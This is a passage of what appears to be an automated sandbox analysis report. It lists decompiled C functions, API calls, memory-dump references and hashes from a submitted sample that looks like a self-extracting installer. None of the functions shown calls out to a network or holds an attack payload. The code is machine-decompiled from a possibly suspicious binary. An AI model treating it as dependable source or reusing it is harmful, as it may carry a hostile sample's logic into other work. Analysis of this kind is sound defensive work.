                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x00de4880
                                                                                                                                                                                                        0x00de488c
                                                                                                                                                                                                        0x00de4894
                                                                                                                                                                                                        0x00de48a0
                                                                                                                                                                                                        0x00de48c9
                                                                                                                                                                                                        0x00de48ce
                                                                                                                                                                                                        0x00de48a2
                                                                                                                                                                                                        0x00de48a8
                                                                                                                                                                                                        0x00de48b7
                                                                                                                                                                                                        0x00de48bc
                                                                                                                                                                                                        0x00de48aa
                                                                                                                                                                                                        0x00de48ac
                                                                                                                                                                                                        0x00de48ac
                                                                                                                                                                                                        0x00de48a8
                                                                                                                                                                                                        0x00de48de
                                                                                                                                                                                                        0x00de48e7
                                                                                                                                                                                                        0x00de490b
                                                                                                                                                                                                        0x00de48ee
                                                                                                                                                                                                        0x00de48f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4902

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00DE4A23,?,00DE4F67,*MEMCAB,00008000,00000180), ref: 00DE48DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00DE4F67,*MEMCAB,00008000,00000180), ref: 00DE4902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 625c7517618878f0fc0db579fadf8280cbf85616ebddbcea9dfaf8afb74fb2f7
                                                                                                                                                                                                        • Instruction ID: bcd2868e00fda6c5abf87584376cb4f8feacc157a5090310f06d2d50310fb2d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 625c7517618878f0fc0db579fadf8280cbf85616ebddbcea9dfaf8afb74fb2f7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8101FBA7E126B026F324612A4C88FB7551CDB96735F1B0735BDEAEB2D2D5A49C0481F0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00DE4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				struct HWND__* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 =  *0xde858c; // 0x268
                                                                                                                                                                                                        				_t9 = E00DE3680(_t20);
                                                                                                                                                                                                        				if( *0xde91d8 == 0) {
                                                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                                                        					_t12 = WriteFile( *(0xde8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t25 = _a12;
                                                                                                                                                                                                        						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        							_t14 =  *0xde9400; // 0x50dc1
                                                                                                                                                                                                        							_t15 = _t14 + _t25;
                                                                                                                                                                                                        							 *0xde9400 = _t15;
                                                                                                                                                                                                        							if( *0xde8184 != 0) {
                                                                                                                                                                                                        								_t21 =  *0xde8584; // 0x0
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xde93f8, 0);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t9 | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x00de4ad5
                                                                                                                                                                                                        0x00de4adb
                                                                                                                                                                                                        0x00de4ae7
                                                                                                                                                                                                        0x00de4aee
                                                                                                                                                                                                        0x00de4b05
                                                                                                                                                                                                        0x00de4b0d
                                                                                                                                                                                                        0x00de4b14
                                                                                                                                                                                                        0x00de4b1a
                                                                                                                                                                                                        0x00de4b1c
                                                                                                                                                                                                        0x00de4b21
                                                                                                                                                                                                        0x00de4b2a
                                                                                                                                                                                                        0x00de4b2f
                                                                                                                                                                                                        0x00de4b31
                                                                                                                                                                                                        0x00de4b39
                                                                                                                                                                                                        0x00de4b54
                                                                                                                                                                                                        0x00de4b54
                                                                                                                                                                                                        0x00de4b39
                                                                                                                                                                                                        0x00de4b2f
                                                                                                                                                                                                        0x00de4b0f
                                                                                                                                                                                                        0x00de4b0f
                                                                                                                                                                                                        0x00de4b0f
                                                                                                                                                                                                        0x00de4b5e
                                                                                                                                                                                                        0x00de4ae9
                                                                                                                                                                                                        0x00de4aed
                                                                                                                                                                                                        0x00de4aed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00DE369F
                                                                                                                                                                                                          • Part of subcall function 00DE3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE36B2
                                                                                                                                                                                                          • Part of subcall function 00DE3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE36DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00DE4B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: 99805eb343a1ff8877cf98d789f53bc1f79ca25cce05d2abd48471948199e4dd
                                                                                                                                                                                                        • Instruction ID: 923e05493bbcd091a7e07fe5af948bc1a6ec5d2d902d766584408308cb872add
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99805eb343a1ff8877cf98d789f53bc1f79ca25cce05d2abd48471948199e4dd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5018031200381ABDB15AF6ADC95BA6775AF744725F088225F939DB2E0CB71D811CB70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                        				char* _t6;
                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				char* _t16;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				char* _t19;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                                        				_t10 = __edx;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				_t1 = _t17 + 1; // 0xde8b3f
                                                                                                                                                                                                        				_t12 = _t1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t4 =  *_t17;
                                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                                        				} while (_t4 != 0);
                                                                                                                                                                                                        				_t18 = _t17 - _t12;
                                                                                                                                                                                                        				_t2 = _t18 + 1; // 0xde8b40
                                                                                                                                                                                                        				if(_t2 < __edx) {
                                                                                                                                                                                                        					_t19 = _t18 + __ecx;
                                                                                                                                                                                                        					if(_t19 > __ecx) {
                                                                                                                                                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                        						if( *_t8 != 0x5c) {
                                                                                                                                                                                                        							 *_t19 = 0x5c;
                                                                                                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t6 = _a4;
                                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                                        					while( *_t6 == 0x20) {
                                                                                                                                                                                                        						_t6 = _t6 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E00DE16B3(_t16, _t10, _t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0x8007007a;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x00de6592
                                                                                                                                                                                                        0x00de6594
                                                                                                                                                                                                        0x00de6596
                                                                                                                                                                                                        0x00de6598
                                                                                                                                                                                                        0x00de6598
                                                                                                                                                                                                        0x00de659b
                                                                                                                                                                                                        0x00de659b
                                                                                                                                                                                                        0x00de659d
                                                                                                                                                                                                        0x00de659e
                                                                                                                                                                                                        0x00de65a2
                                                                                                                                                                                                        0x00de65a4
                                                                                                                                                                                                        0x00de65a9
                                                                                                                                                                                                        0x00de65b2
                                                                                                                                                                                                        0x00de65b6
                                                                                                                                                                                                        0x00de65ba
                                                                                                                                                                                                        0x00de65c3
                                                                                                                                                                                                        0x00de65c5
                                                                                                                                                                                                        0x00de65c8
                                                                                                                                                                                                        0x00de65c8
                                                                                                                                                                                                        0x00de65c3
                                                                                                                                                                                                        0x00de65c9
                                                                                                                                                                                                        0x00de65cc
                                                                                                                                                                                                        0x00de65d2
                                                                                                                                                                                                        0x00de65d1
                                                                                                                                                                                                        0x00de65d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de65dc
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(00DE8B3E,00DE8B3F,00000001,00DE8B3E,-00000003,?,00DE60EC,00DE1140,?), ref: 00DE65BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: 994b1fd8788816f6a547f0fc5a36095438ec51484d103c4f8a04ec885f1ea275
                                                                                                                                                                                                        • Instruction ID: 905e6d2f0c6168000ea702ba11fb7caf4d8b89b06bf3c8070436ea856c41b77a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 994b1fd8788816f6a547f0fc5a36095438ec51484d103c4f8a04ec885f1ea275
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78F02D323042D09BD331651F9884B67BFD99BA5390F18055EE8DAC3205CA65DC4583B0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00DE621E() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					0x4f0 = 2;
                                                                                                                                                                                                        					_t9 = E00DE597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00DE44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					_t9 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x00de6229
                                                                                                                                                                                                        0x00de6230
                                                                                                                                                                                                        0x00de6247
                                                                                                                                                                                                        0x00de626a
                                                                                                                                                                                                        0x00de6272
                                                                                                                                                                                                        0x00de6249
                                                                                                                                                                                                        0x00de6255
                                                                                                                                                                                                        0x00de625f
                                                                                                                                                                                                        0x00de6264
                                                                                                                                                                                                        0x00de6264
                                                                                                                                                                                                        0x00de6284

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00DE623F
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                          • Part of subcall function 00DE6285: GetLastError.KERNEL32(00DE5BBC), ref: 00DE6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: 68295d9e588e4263602d98d3dc68084673591872b8df9072af11aea14d7d82a6
                                                                                                                                                                                                        • Instruction ID: f7e9993097fad991132306b84c52861414f3a05753350179c6a85f43b8baa98d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68295d9e588e4263602d98d3dc68084673591872b8df9072af11aea14d7d82a6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2F0E970700388ABD750FB759D42FBE77ACDB54340F400469BA89DB182DD74DD448674
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE4B60(signed int _a4) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 = _a4 * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t15 + 0xde8d64)) != 1) {
                                                                                                                                                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xde8d74)); // executed
                                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                                        						return _t9 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0xde8d60)) = 1;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xde8d60)) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xde8d68)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xde8d70)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xde8d6c)) = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x00de4b66
                                                                                                                                                                                                        0x00de4b74
                                                                                                                                                                                                        0x00de4b98
                                                                                                                                                                                                        0x00de4ba0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4bac
                                                                                                                                                                                                        0x00de4ba4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4ba4
                                                                                                                                                                                                        0x00de4b78
                                                                                                                                                                                                        0x00de4b7e
                                                                                                                                                                                                        0x00de4b84
                                                                                                                                                                                                        0x00de4b8a
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00DE4FA1,00000000), ref: 00DE4B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: e1dac731edfcb92c7f53e64378675f95dc028ce34f0acbf6368e868d73ea35ab
                                                                                                                                                                                                        • Instruction ID: 50b4bde73f4bbb687ec06b5b9affb19827b0c38d8da7fbcf90b47a97acbdacf2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1dac731edfcb92c7f53e64378675f95dc028ce34f0acbf6368e868d73ea35ab
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10F01231900B889E4771FF3ACC00652BBECBA953603500A2ED4AFD2190DB32A451FBB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE66AE(CHAR* __ecx) {
                                                                                                                                                                                                        				unsigned int _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00de66b1
                                                                                                                                                                                                        0x00de66ba
                                                                                                                                                                                                        0x00de66c7
                                                                                                                                                                                                        0x00de66bc
                                                                                                                                                                                                        0x00de66be
                                                                                                                                                                                                        0x00de66be

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,00DE4777,?,00DE4E38,?), ref: 00DE66B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 152dfc9e31b1231cc61db06b037e3308a5e8f9910d3e5e448df7f8842f4cfe3c
                                                                                                                                                                                                        • Instruction ID: 6f5a640ea81d55c393d2077ef5dad7edc68363c08c287bac8b182ff216702979
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 152dfc9e31b1231cc61db06b037e3308a5e8f9910d3e5e448df7f8842f4cfe3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FB09276232581426A2026366C695562841A6D123A7E92B94F032C02E4CA3ED946D024
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE4CA0(long _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00de4caa
                                                                                                                                                                                                        0x00de4cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00DE4CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: fda2e70ee709f66328f839b2bf0abb5ae9b99d6333362894f7d0f3302c813a09
                                                                                                                                                                                                        • Instruction ID: f5835039929c39bf9d83a641ac661dab21c90e5c032e0549fa95714109f89082
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fda2e70ee709f66328f839b2bf0abb5ae9b99d6333362894f7d0f3302c813a09
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08B0123304434CB7CF002FC6EC09F853F1DE7C4761F150000F60C8D1508A72A51086A6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE4CC0(void* _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00de4cc8
                                                                                                                                                                                                        0x00de4ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: 1e5575fbd1a0633257aa7b0825578619f3bb42475f7bc9c18fc443251ec99d13
                                                                                                                                                                                                        • Instruction ID: 6398b030ad6a2c70dc86f9938baae0cf08c87e1121eac71a3493d99b420d551e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e5575fbd1a0633257aa7b0825578619f3bb42475f7bc9c18fc443251ec99d13
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AEB0123100024CB78F002B46EC088453F1DD6C02707000010F50C891218B33A8118595
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00DE5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				CHAR* _v265;
                                                                                                                                                                                                        				char _v266;
                                                                                                                                                                                                        				char _v267;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				CHAR* _v272;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				signed int _v296;
                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				CHAR* _t69;
                                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				char _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                        				void* _t142;
                                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                                        				CHAR* _t144;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                        				void* _t149;
